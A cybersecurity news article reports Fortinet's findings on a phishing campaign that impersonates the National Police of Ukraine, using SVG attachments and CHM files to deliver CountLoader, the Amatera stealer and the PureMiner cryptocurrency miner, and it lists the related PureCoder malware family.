New Phishing Campaign Impersonates Ukrainian Police to Deliver Amatera Stealer and PureMiner

Researchers at Fortinet FortiGuard Labs have uncovered a new cyber-attack campaign masquerading as communications from the National Police of Ukraine and employing an unusual malware delivery chain. The attackers dispatch emails with SVG attachments that trigger a multi-stage download sequence: first CountLoader, then the Amatera stealer, and finally a stealthy cryptocurrency miner named PureMiner.

The intrusion sequence is layered and deliberate. Recipients receive a message ostensibly from Ukrainian law enforcement; the attachment is an SVG file embedding HTML that redirects the victim to a password-protected ZIP archive. Inside that archive sits a Windows CHM help file which, once opened, activates CountLoader. Previously observed by Silent Push, CountLoader has been used to deploy Cobalt Strike, AdaptixC2 and PureHVNC RATs; in this campaign it serves to deliver Amatera Stealer and PureMiner.

Amatera Stealer is a derivative of ACRStealer: it harvests system fingerprints, exfiltrates files with targeted extensions, extracts credentials and data from Chromium- and Gecko-based browsers, and steals account information from Steam, Telegram, FileZilla and various cryptocurrency wallets.

PureMiner, implemented in .NET, operates as a fileless process to mine cryptocurrency covertly. The malware employs obfuscation techniques such as ahead-of-time compilation with process-name spoofing or in-memory loading using PythonMemoryModule to evade detection.

Of particular note is the provenance of the tooling: PureMiner and PureHVNC belong to a family attributed to an actor using the handle “PureCoder.” That suite also includes PureCrypter (which conceals .NET and native binaries), PureRAT (aka ResolverRAT, a successor to PureHVNC), PureLogs for data theft and logging, BlueLoader for converting infected hosts into a botnet, and PureClipper, which substitutes clipboard cryptocurrency addresses to hijack transfers.

Fortinet stresses that abusing SVG files as a façade for HTML makes these campaigns especially insidious: recipients are unlikely to suspect a graphic file and so open the attachment without caution. In this instance, that very technique permitted the silent deployment of CountLoader and the subsequent installation of PureCoder’s stealth toolset.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy